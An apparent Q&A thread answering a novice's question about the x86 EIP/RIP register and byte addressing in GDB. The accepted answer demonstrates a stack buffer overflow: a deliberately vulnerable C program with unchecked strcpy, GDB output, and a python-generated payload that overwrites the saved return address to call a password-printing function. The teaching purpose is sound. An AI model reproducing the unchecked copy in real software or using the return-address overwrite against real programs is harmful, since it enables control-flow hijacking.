Understanding how EIP (RIP) register works?

Question

I'm a complete novice to computer architecture and the low-level things that happen at the processor/memory level, so I'll start by saying that. What I've done with computers has pretty much always been high-level programming: C++, Java, etc.

That being said, I'm currently reading a book that is starting to delve into the low level programming stuff, assembly, registers, pointers, etc. I'm having a hard time understanding how the EIP register works.

From what is said in the book, each memory address has one byte, and each byte has a memory address.

From what I'm reading about the EIP register, it points to the next set of instructions for the processor to do. While using debugging tools (GDB) to follow along in the book, if you were to examine memory at a particular location, say:

x/8xb allegedly lets you examine the first 8 bytes at that memory address. But if each memory address holds only 1 byte, I don't understand how that works. Can someone help me understand this? I have looked for thorough explanations of how this register works but I can't really find anything.

This is a practical question about a concrete architecture, it's an engineering question, not a science question, so I'm migrating it to a site where it's on-topic. — Gilles 'SO- stop being evil'
It's showing the 8 bytes at sequentially increasing memory addresses from the one specified. — jcoder
They aren't all at that same address. You can easily see this if you make the address one or two higher and then show 8 bytes again. — harold
When they say "8 bytes at a particular address", what they mean is "8 bytes in the chunk of memory that starts at the address". Second, third bytes and so on would have greater addresses. — Seva Alekseyev

Niklas R. · Accepted Answer · 2019-11-04T19:52:59

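The instruction pointer is a register on the processor (a small piece of storage inside the CPU, not a location in main memory) that holds the address of the next instruction to execute. It is called EIP in 32-bit mode and RIP in 64-bit mode. As each instruction is fetched, the register advances by the length of that instruction, which on x86 varies from 1 to 15 bytes; it does not step by a fixed 4 or 8 bytes. Jumps, calls and returns load it with a new address instead.

When the program calls a function, the call instruction pushes the address of the instruction following the call onto the stack. That saved instruction pointer (ip/eip/rip) is the return address: the address execution jumps back to when the function returns.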
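As a rough illustration of how the instruction pointer moves through straight-line x86-64 code, where instructions differ in length, here is a toy model in Python. The four encodings are a common function prologue and return; the start address 0x1000 and the `trace` helper are made up for this sketch, and jumps, calls and returns (which load rip with a new value) are deliberately ignored.

```python
# Toy model: rip advances by the length of each instruction, not by a fixed step.
# The start address and the trace() helper are assumptions for illustration only.
instructions = [
    ("push rbp",      bytes.fromhex("55")),        # 1 byte
    ("mov rbp, rsp",  bytes.fromhex("4889e5")),    # 3 bytes
    ("sub rsp, 0x10", bytes.fromhex("4883ec10")),  # 4 bytes
    ("ret",           bytes.fromhex("c3")),        # 1 byte
]


def trace(start, program):
    """Return (address, mnemonic, length) for each instruction as laid out in memory."""
    rip = start
    steps = []
    for mnemonic, encoding in program:
        steps.append((rip, mnemonic, len(encoding)))
        rip += len(encoding)  # the next instruction starts right after this one
    return steps


steps = trace(0x1000, instructions)
for address, mnemonic, length in steps:
    print(f"{address:#x}: {mnemonic:<14} ({length} byte(s))")
```

The addresses come out as 0x1000, 0x1001, 0x1004 and 0x1008, so the gaps between them are 1, 3 and 4 bytes rather than one fixed step.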

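You wrote: "From what is said in the book, each memory address has one byte, and each byte has a memory address."

That is correct, and it is not limited to 8-bit computers: x86 memory is byte-addressable in both 32-bit and 64-bit mode. "32-bit" and "64-bit" describe the width of registers and addresses, not how many bytes live at one address. A command such as x/8xb therefore shows the bytes at 8 consecutive addresses, starting at the one you give it. Consider the following program as an example: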

#include <stdio.h>
#include <string.h>

char * pwd = "pwd0";

void print_my_pwd() {
  printf("your pwd is: %s\n", pwd);
}

int check_pwd(char * uname, char * upwd) {
  char name[8];
  strcpy(name, uname);

  if (strcmp(pwd, upwd)) {
    printf("non authorized\n");
    return 1;
  }
  printf("authorized\n");
  return 0;
}

int main(int argc, char ** argv) {
  check_pwd(argv[1], argv[2]);
  return 0;
}

I can build it and examine it with gdb.

$ make
gcc -O0 -ggdb -o main main.c -fno-stack-protector
$ gdb main
GNU gdb (Ubuntu 8.2-0ubuntu1~18.04) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from main...done.
(gdb) b check_pwd
Breakpoint 1 at 0x76c: file main.c, line 12.
(gdb) run joe f00b4r42
Starting program: /home/developer/main joe f00b4r42
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, check_pwd (uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42") at main.c:12
12    strcpy(name, uname);
(gdb) info frame
Stack level 0, frame at 0x7fffffffd6d0:
 rip = 0x55555555476c in check_pwd (main.c:12); saved rip = 0x5555555547ef
 called by frame at 0x7fffffffd6f0
 source language c.
 Arglist at 0x7fffffffd6c0, args: uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42"
 Locals at 0x7fffffffd6c0, Previous frame's sp is 0x7fffffffd6d0
 Saved registers:
  rbp at 0x7fffffffd6c0, rip at 0x7fffffffd6c8

You see above that the saved rip (the saved instruction pointer, i.e. the return address) is stored at 0x7fffffffd6c8 and holds the value 0x5555555547ef (note the important difference between where it is and what it is). I can deliberately overflow the buffer to overwrite this value with an address I know:

(gdb) p &name
$1 = (char (*)[8]) 0x7fffffffd6b8
(gdb) p &print_my_pwd
$2 = (void (*)()) 0x55555555473a <print_my_pwd>
(gdb) Quit
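To connect this with the question about x/8xb: the saved rip occupies eight consecutive byte addresses, starting at the location reported by info frame. The following Python sketch computes what a byte-wise dump of those eight addresses would be expected to look like. It is derived from the two numbers in the info frame output, not captured from GDB, and `dump_bytes` is a hypothetical helper.

```python
import struct

SAVED_RIP_ADDR = 0x7fffffffd6c8   # "rip at ..." from info frame (where it is)
SAVED_RIP_VALUE = 0x5555555547ef  # "saved rip = ..." from info frame (what it is)


def dump_bytes(address, value, count=8):
    """Return (address, byte) pairs for a 64-bit value stored little-endian."""
    raw = struct.pack("<Q", value)  # least significant byte first
    return [(address + i, raw[i]) for i in range(count)]


rows = dump_bytes(SAVED_RIP_ADDR, SAVED_RIP_VALUE)
for addr, byte in rows:
    print(f"{addr:#x}: 0x{byte:02x}")
```

Each row is one address holding one byte, from 0x7fffffffd6c8 up to 0x7fffffffd6cf. The lowest address holds 0xef, the least significant byte of the value.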

Now I know the distance between name and the saved rip (not their values but their locations): 0x7fffffffd6c8 - 0x7fffffffd6b8 = 16. So I write 16 filler bytes starting at name, and the bytes that follow land on the saved rip. What I put there is the address of print_my_pwd, 0x55555555473a, whose bytes 0x55 0x55 0x55 0x55 0x47 0x3a spell UUUUG: in ASCII. They have to be written in reverse order, as :GUUUU, because this is a little-endian machine:
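The arithmetic and the byte order can be checked with a few lines of Python. This is only a sketch using the addresses from this particular GDB session; the constant names are mine. The trailing zero bytes are dropped because a command-line argument cannot contain NUL bytes.

```python
import struct

NAME_ADDR = 0x7fffffffd6b8       # p &name
SAVED_RIP_ADDR = 0x7fffffffd6c8  # "rip at ..." from info frame
TARGET = 0x55555555473a          # p &print_my_pwd

# Number of filler bytes needed before the write reaches the saved rip.
offset = SAVED_RIP_ADDR - NAME_ADDR

# Little-endian encoding of the 64-bit target address.
packed = struct.pack("<Q", TARGET)

# Strip the two high zero bytes: they cannot be passed in argv.
payload = b"A" * offset + packed.rstrip(b"\x00")

print(offset)
print(packed)
print(payload)
```

The packed address begins with the bytes for `:`, `G` and four `U` characters, which is why the argument ends in :GUUUU.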

$ ./main $(python -c "print 'AAAAAAAAAAAAAAAA:GUUUU'") B
non authorized
your pwd is: pwd0
Segmentation fault (core dumped)
$

As you see, the input overflowed name and overwrote the saved instruction pointer, so when check_pwd returned, execution jumped to the function that prints the password.
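What the overflow does to the stack frame can be imitated with a byte array. This is a simplified model, not the real process memory: it assumes the 24 bytes starting at name are name[8], the saved rbp and the saved rip, as the addresses in the GDB session suggest. The saved rbp value is a placeholder I chose, and `strcpy_into` is a hypothetical stand-in for strcpy.

```python
import struct

# Model of the 24 bytes starting at &name: name[8], saved rbp, saved rip.
frame = bytearray(24)
struct.pack_into("<Q", frame, 8, 0x7fffffffd6e0)   # saved rbp: assumed placeholder value
struct.pack_into("<Q", frame, 16, 0x5555555547ef)  # saved rip from info frame


def strcpy_into(buf, offset, src):
    """Copy src plus a terminating NUL into buf with no bounds check, like strcpy."""
    data = src + b"\x00"
    buf[offset:offset + len(data)] = data


# Same argument as on the command line: 16 filler bytes, then the address bytes.
strcpy_into(frame, 0, b"A" * 16 + b":GUUUU")

(saved_rip,) = struct.unpack_from("<Q", frame, 16)
print(hex(saved_rip))
```

In this model the copy writes 23 bytes: 22 from the argument plus the terminating NUL. The last byte of the saved rip is never touched, but it was already zero, so the slot now reads as the address of print_my_pwd.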

Don't write code like this in real life, but hopefully it helps you understand how the instruction pointer works and what can go wrong when you don't check the bounds of your input.
